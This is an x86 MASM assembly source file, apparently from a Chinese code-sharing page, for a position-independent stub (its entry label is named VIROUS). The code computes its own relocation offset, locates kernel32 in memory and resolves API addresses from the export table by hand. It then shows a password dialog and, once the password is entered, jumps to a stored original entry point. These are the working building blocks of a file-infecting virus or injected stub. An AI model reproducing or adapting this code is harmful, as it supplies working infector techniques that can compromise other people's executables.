📄 mygetaip.asm
字号:
.386
.model flat, stdcall
option casemap:none
include windows.inc
.code
main:
call VIROUS
VIROUS: pop esi
sub esi, offset VIROUS
push [esp]
call GetKernelBase
mov [esi + aKernel32Base], eax
;取得LoadLibraryA地址
lea edx, [esi + szLoadLibraryA]
push edx
push eax
call GetAIPAddress
mov [esi + aLoadLibraryA], eax
;取得GetProcAddress地址
lea edx, [esi + szGetProcAddress]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aGetProcAddress], eax
;取得GetModuleHandleA地址
lea edx, [esi + szGetModuleHandleA]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aGetModuleHandleA], eax
;取得GetModuleHandleA地址
lea edx, [esi + szExitProcess]
push edx
push [esi + aKernel32Base]
call GetAIPAddress
mov [esi + aExitProcess], eax
;取得ModuleHandleA
push NULL
call [esi + aGetModuleHandleA]
mov [esi + aModuleHandle], eax
;取得User32.dll的 Handle
lea edx, [esi + szUser32]
push edx
call [esi + aLoadLibraryA]
mov [esi + aUser32Handle], eax
;取得SetWindowLongA的地址
lea edx, [esi + szSetWindowLongA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aSetWindowLongA], eax
;取得GetMessageA的地址
lea edx, [esi + szGetMessageA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aGetMessageA], eax
;取得TranslateMessage的地址
lea edx, [esi + szTranslateMessage]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aTranslateMessage], eax
;取得DispatchMessageA的地址
lea edx, [esi + szDispatchMessageA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDispatchMessageA], eax
;取得DefWindowProcA的地址
lea edx, [esi + szDefWindowProcA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDefWindowProcA], eax
;取得DestroyWindow的地址
lea edx, [esi + szDestroyWindow]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aDestroyWindow], eax
;取得GetDlgItemTextA的地址
lea edx, [esi + szGetDlgItemTextA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aGetDlgItemTextA], eax
;取得CreateWindowExA的地址
lea edx, [esi + szCreateWindowExA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aCreateWindowExA], eax
;取得CallWindowProcA的地址
lea edx, [esi + szCallWindowProcA]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aCallWindowProcA], eax
;取得ShowWindow的地址
lea edx, [esi + szShowWindow]
push edx
mov eax, [esi + aUser32Handle]
push eax
call [esi + aGetProcAddress]
mov [esi + aShowWindow], eax
;调用CreateWindowExA
push NULL
push [esi + aModuleHandle]
push NULL
push NULL
push 160
push 250
push 200
push 300
push WS_DLGFRAME or WS_SYSMENU or WS_VISIBLE or WS_POPUPWINDOW or WS_CLIPCHILDREN\
or WS_DLGFRAME or DS_3DLOOK or DS_FIXEDSYS or DS_MODALFRAME
lea edx, [esi + szCaption]
push edx
lea edx, [esi + szClassName]
push edx
push WS_EX_CONTROLPARENT or WS_EX_DLGMODALFRAME
call [esi + aCreateWindowExA]
mov [esi + aWnd], eax
push NULL
push [esi + aModuleHandle]
push 101
push [esi + aWnd]
push 25
push 50
push 80
push 40
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szOK]
push edx
lea edx, [esi + szButton]
push edx
push NULL
call [esi + aCreateWindowExA]
push NULL
push [esi + aModuleHandle]
push 100
push [esi + aWnd]
push 25
push 50
push 80
push 150
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szCancel]
push edx
lea edx, [esi + szButton]
push edx
push NULL
call [esi + aCreateWindowExA]
push NULL
push [esi + aModuleHandle]
push 3
push [esi + aWnd]
push 25
push 90
push 35
push 30
push WS_VISIBLE or WS_CHILD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
lea edx, [esi + szPassWord]
push edx
lea edx, [esi + szStatic]
push edx
push NULL
call [esi + aCreateWindowExA]
push NULL
push [esi + aModuleHandle]
push 4
push [esi + aWnd]
push 25
push 90
push 30
push 120
push WS_VISIBLE or WS_CHILD or ES_PASSWORD or WS_TABSTOP or WS_EX_NOPARENTNOTIFY
push NULL
lea edx, [esi + szEdit]
push edx
push WS_EX_CLIENTEDGE
call [esi + aCreateWindowExA]
;调用SetWindowLongA
lea edx, [esi + _MyDialogProc]
push edx
push GWL_WNDPROC
push [esi + aWnd]
call [esi + aSetWindowLongA]
mov [esi + aOriWndProc], eax
;调用ShowWindow
push eax
push 1
call [esi + aShowWindow]
_MsgLoop:
push 0
push 0
push NULL
lea edx, [esi + msg]
push edx
call [esi + aGetMessageA]
cmp eax, 0
jz _ExitMsgLoop
lea edx, [esi + msg]
push edx
call [esi + aTranslateMessage]
lea edx, [esi + msg]
push edx
call [esi + aDispatchMessageA]
jmp _MsgLoop
_ExitMsgLoop:
;调用MessageBoxA
;push MB_OK or MB_ICONINFORMATION
;lea edx, [esi + szCaption]
;push edx
;lea edx, [esi + szMsg]
;push edx
;push 0
;call [esi + aMessageBoxA]
;mov eax, [esi + Old_ImageBase]
;add eax, [esi + Old_AddressOfEntryPoint]
;push eax
ret
;********************************************************************
; 功能: 获取Kernel32.dll的基址
; 入口: 程序开始时[esp]
; 返回: Kernel32.dll的基址
;********************************************************************
GetKernelBase proc uses esi edi dwKernelRet:DWORD
local @BaseAddr:DWORD
mov @BaseAddr, NULL
mov edi, dwKernelRet
and edi, 0FFFF0000h
.while TRUE
.if word ptr [edi] == IMAGE_DOS_SIGNATURE
mov esi, edi
add esi, [esi + 03ch]
.if word ptr [esi] == IMAGE_NT_SIGNATURE
mov @BaseAddr, edi
.break
.endif
.endif
dec edi
xor di,di
.if edi < 70000000h
.break
.endif
.endw
mov eax, @BaseAddr
ret
GetKernelBase endp
;**********************************************************************
;函数功能:从内存中 Kernel32.dll 的导出表中获取某个 API 的入口地址
;**********************************************************************
GetAIPAddress proc uses ebx ecx edx esi edi hModule:DWORD, szApiName:DWORD
LOCAL dwReturn: DWORD
LOCAL dwApiLength: DWORD
mov dwReturn, 0
mov esi, szApiName
mov edx, esi
_GetStrLen:
cmp byte ptr [esi], 0
jz _CmpExit
inc esi
jmp _GetStrLen
_CmpExit:
sub esi, edx
inc esi
mov dwApiLength, esi
mov esi, hModule
add esi, [esi + 03ch]
assume esi: ptr IMAGE_NT_HEADERS
lea edi, [esi].OptionalHeader.DataDirectory
add edi, 0*sizeof IMAGE_DATA_DIRECTORY
assume edi: ptr IMAGE_DATA_DIRECTORY
mov esi, [edi].VirtualAddress
add esi, hModule
assume esi: ptr IMAGE_EXPORT_DIRECTORY
xor edx, edx
mov ebx, [esi].AddressOfNames
add ebx, hModule
.repeat
push esi
mov ecx, dwApiLength
mov esi, [ebx]
add esi, hModule
mov edi, szApiName
cld
repz cmpsb
.if ZERO?
pop esi
jmp _Find_Index
.endif
inc edx
add ebx, 4
pop esi
.until edx >= [esi].NumberOfNames
jmp _Exit
_Find_Index:
;取得函数序号在函数序号数组中的下标
sub ebx, hModule
sub ebx, [esi].AddressOfNames
shr ebx, 1
;计算出函数序号所在函数序号数组中的地址
add ebx, [esi].AddressOfNameOrdinals
add ebx, hModule
;根据“函数序号”,取得该函数在“函数地址数组“中的地址
movzx ebx, word ptr [ebx]
shl ebx, 2
add ebx, [esi].AddressOfFunctions
add ebx, hModule
;取得函数地址
mov eax, [ebx]
add eax, hModule
mov dwReturn, eax
_Exit:
mov eax, dwReturn
ret
GetAIPAddress endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 对话框处理函数
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_MyDialogProc proc uses esi edi hWnd,uMsg,wParam,lParam
local @dwStrLength:DWORD
call DProVIROUS
DProVIROUS: pop esi
sub esi, offset DProVIROUS
mov eax, uMsg
.if eax == WM_DESTROY || eax == WM_CLOSE
cmp [esi + aExit], 10
.if ZERO?
ret
.endif
push 0
call [esi + aExitProcess]
ret
.elseif eax == WM_COMMAND
mov eax, wParam
movzx eax, ax
.if eax == 100
push 0
call [esi + aExitProcess]
ret
.elseif eax == 101
push 11
lea eax, [esi + szGetPWD]
push eax
push 4
push hWnd
call [esi + aGetDlgItemTextA]
lea edi, [esi + szPWD]
mov eax, edi
_GetPWDLen:
cmp byte ptr [edi], 0
jz _CmpPWDExit
inc edi
jmp _GetPWDLen
_CmpPWDExit:
sub edi, eax
inc edi
mov @dwStrLength, edi
mov ecx, @dwStrLength
lea edi, [esi + szPWD]
lea eax, [esi + szGetPWD]
push esi
mov esi, eax
cld
repz cmpsb
.if ZERO?
pop esi
jmp _PWDRight
.endif
ret
_PWDRight:
mov [esi + aExit], 10
push hWnd
call [esi + aDestroyWindow]
mov eax, [esi + Old_ImageBase]
add eax, [esi + Old_AddressOfEntryPoint]
call eax
ret
.endif
push lParam
push wParam
push uMsg
push hWnd
push [esi + aOriWndProc]
call [esi + aCallWindowProcA]
ret
.else
push lParam
push wParam
push uMsg
push hWnd
push [esi + aOriWndProc]
call [esi + aCallWindowProcA]
ret
.endif
mov eax, 1
ret
_MyDialogProc endp
aOriWndProc dd 0
aModuleHandle dd 0
aUser32Handle dd 0
szUser32 db "user32.dll", 0
aKernel32Base dd 0
szLoadLibraryA db "LoadLibraryA", 0
aLoadLibraryA dd 0
szGetModuleHandleA db "GetModuleHandleA", 0
aGetModuleHandleA dd 0
szExitProcess db "ExitProcess", 0
aExitProcess dd 0
szGetProcAddress db "GetProcAddress", 0
aGetProcAddress dd 0
szTranslateMessage db "TranslateMessage", 0
aTranslateMessage dd 0
szDispatchMessageA db "DispatchMessageA", 0
aDispatchMessageA dd 0
szGetMessageA db "GetMessageA", 0
szDefWindowProcA db "DefWindowProcA", 0
aDefWindowProcA dd 0
aGetMessageA dd 0
szShowWindow db "ShowWindow", 0
aShowWindow dd 0
szCreateWindowExA db "CreateWindowExA", 0
aCreateWindowExA dd 0
szSetWindowLongA db "SetWindowLongA", 0
aSetWindowLongA dd 0
szDestroyWindow db "DestroyWindow", 0
szGetDlgItemTextA db "GetDlgItemTextA", 0
szCallWindowProcA db "CallWindowProcA", 0
aCallWindowProcA dd 0
aGetDlgItemTextA dd 0
aDestroyWindow dd 0
aWnd dd 0
aExit dd 0
msg MSG <0>
szGetPWD db 0,0,0,0,0,0,0,0,0,0,0,0
szClassName db "#32770", 0
szButton db "Button", 0
szStatic db "Static", 0
szEdit db "Edit", 0
szPassWord db "请输入密码:", 0
szCancel db "取消", 0
szOK db "确定", 0
szCaption db "郭肇禄提醒您输入密码",0
szMsg db "这是郭肇禄写的!", 13, 10, 13, 10, "这很好玩吧?", 0
szPWD db 0,0,0,0,0,0,0,0,0,0,0,0
Old_ImageBase dd 0
Old_AddressOfEntryPoint dd 0
end main⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -